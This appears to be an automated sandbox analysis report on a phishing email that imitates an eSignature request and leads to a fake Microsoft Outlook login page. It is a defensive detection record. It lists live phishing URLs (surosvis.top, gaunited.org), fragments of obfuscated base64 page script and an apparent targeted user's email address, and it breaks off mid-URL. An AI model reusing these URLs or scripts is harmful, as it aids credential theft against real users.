Edit tour

Windows Analysis Report
July2024.eml

Overview

General Information

Sample name:	July2024.eml renamed because original name is a hash value
Original sample name:	eSignature Required on _New Live-quinn Contract SC #73461-0-252 - Important Notices and Disclosures_ eSign chigley_Live-quinn 03July2024.eml
Analysis ID:	1470335
MD5:	921a018c2476712d1cdeb21f54161b4d
SHA1:	c0a2d49d221ed78d21cb10cf62bd261d5adefe41
SHA256:	af94c507da9bdbccd2d48a010d31e101a00955d85ceca4dc928a0d6bfe3e40e6
Infos:

Detection

HTMLPhisher

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish54

AI detected suspicious e-Mail

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Detected hidden input values containing email addresses (often used in phishing pages)

Detected suspicious crossdomain redirect

Found iframes

HTML body contains low number of good links

HTML page contains hidden URLs or javascript code

HTML page contains obfuscated script src

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Queries the volume information (name, serial number etc) of a device

Sigma detected: Office Autorun Keys Modification

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

OUTLOOK.EXE (PID: 2292 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\July2024.eml" MD5: 91A5292942864110ED734005B7E005C0)

ai.exe (PID: 6196 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "1A1395ED-3156-4398-B273-55E4A51E07DB" "BAE520AC-A7C2-4C6E-B75C-6411EC74864F" "2292" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)

chrome.exe (PID: 6832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://linkprotect.cudasvc.com/url?a=trk.klclick3.com%2fls%2fclick%3fupn%3du001.dtwVv1Ru50yD1xohsam-2FjGUphIs0dx6BEFCnPUKnDVd8WxxN6ke5PrYREmrbc2FaACBkT2P6I04Err05g1V2G-2FLWFbGytRFzYyHXDtGMPXvgKpTkM4PAsDhkmIIVHb75Z95k7dO9towCf1JeVC0-2BltHIRoei9lcL45PoMfUZg58-3Dh2f-_exTV-2B0nr75-2FAh2SIjRnOxD8JLIRVpQeWRH3nYFKkscxLUYDZn2KtraB9INOvu-2FWzVBLxft0V1cd3MxM8ltrigbptEVCIy4WvDfcq3o-2F1k9y8xxEh-2BmskMqWS1cAI0cUyybGysibzx60BajiblorrgTAih5eI-2FeIKWcpJ7y5D-2BfNj4kkwASBztE4Llx3YbAa3eGKg8vYsy69633-2Bs7KvPlQGtF3LlYx8tlvzy3u75ylBi1w7Tw6ZQ9q7Gw-2B4SvOdnV3-2FGM7WkcnHVnD74QIHFr87Q9bzLB7aV09brNp-2FGGlceXCU-2BCwap3JWTFzuYoGojteFQ6cZ-2BeKHASwrbaJ0fCeoOb5V9VXY51l9YVHkIcBH6wmagxtNtSJCYMzdyhhrMeVanCoqORb9EWLo04ONXAGlz2DKVGTIZnWm-2BTIagNPs4eFWbG1RY3zOOaFl-2BixPuWMrjPD7ymstCwPGDTI8xH7pdc0bOCntvjSd-2FKIIH1AE-3D&c=E,1,i0-TZ9sXrOnWu3n01gckjTjDlt13jbiHHHyOen1ztoOXCOTRFajJR67WUUfxHg4eD2yKNuMiH6kNQH7GWwT9vqakPcW-Xjgx6yxMACB_jKbE1i_F&typo=1\#Y2hpZ2xleUBsaXZlLXF1aW5uLmNvbQ== MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 7024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1924,i,5457991484249521891,2972132230705324861,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
3.9.script.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
3.5.script.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
4.18.script.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
4.13.script.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
3.3.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
4.6.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
4.4.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
Click to see the 2 entries

Sigma Signatures

Sigma detected: Office Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 2292, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://gaunited.org/?xhjvrczy=7916a6b310ba6eced760b22d1d46271e3b1540bdd0cf0f26568259caa28bcc2cc4a34477ba1ecd9bb18135b16dc936bdbe30f9b85e8f3a82522031c68449ab57&email=chigley%40live-quinn.com	SlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://surosvis.top/?qrc=chigley%40live-quinn.com	Avira URL Cloud: Label: phishing
Source: https://surosvis.top/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_sw-M8KkV3_nBot-G1ImRcw2.js	Avira URL Cloud: Label: phishing

Phishing

AI detected phishing page

Source: https://surosvis.top

LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://surosvis.top' is highly suspicious as it does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The webpage mimics the Outlook login page, which is a common target for phishing attacks. The presence of a prominent login form asking for a password without any CAPTCHA further raises suspicion. The use of social engineering techniques is evident as the page attempts to trick users into entering their credentials by imitating a legitimate Microsoft Outlook login page. DOM: 4.6.pages.csv

Phishing site detected (based on favicon image match)

Source: https://surosvis.top	Matcher: Template: microsoft matched with high similarity
Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=true	Matcher: Template: microsoft matched with high similarity

Yara detected HtmlPhish54

Source: Yara match	File source: 3.9.script.csv, type: HTML
Source: Yara match	File source: 3.5.script.csv, type: HTML
Source: Yara match	File source: 4.18.script.csv, type: HTML
Source: Yara match	File source: 4.13.script.csv, type: HTML
Source: Yara match	File source: 3.3.pages.csv, type: HTML
Source: Yara match	File source: 4.6.pages.csv, type: HTML
Source: Yara match	File source: 4.4.pages.csv, type: HTML

Phishing site detected (based on image similarity)

Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=true

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Matcher: Template: microsoft matched

HTTP Parser: chigley@live-quinn.com

Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=true	HTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx
Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=true	HTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx

HTTP Parser: Number of links: 0

Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/

HTTP Parser: Base64 decoded: http://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/

Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc2	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc2	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc2	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX

HTTP Parser: <input type="password" .../> found

Source: https://gaunited.org/?xhjvrczy=7916a6b310ba6eced760b22d1d46271e3b1540bdd0cf0f26568259caa28bcc2cc4a34477ba1ecd9bb18135b16dc936bdbe30f9b85e8f3a82522031c68449ab57&email=chigley%40live-quinn.com	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/a6jpw/0x4AAAAAAAeIDT3Zcm3iJj6N/auto/normal/auto/	HTTP Parser: No favicon
Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN	HTTP Parser: No favicon
Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=true	HTTP Parser: No favicon
Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=true	HTTP Parser: No favicon

Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=true	HTTP Parser: No <meta name="author".. found
Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=true	HTTP Parser: No <meta name="author".. found

Source: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1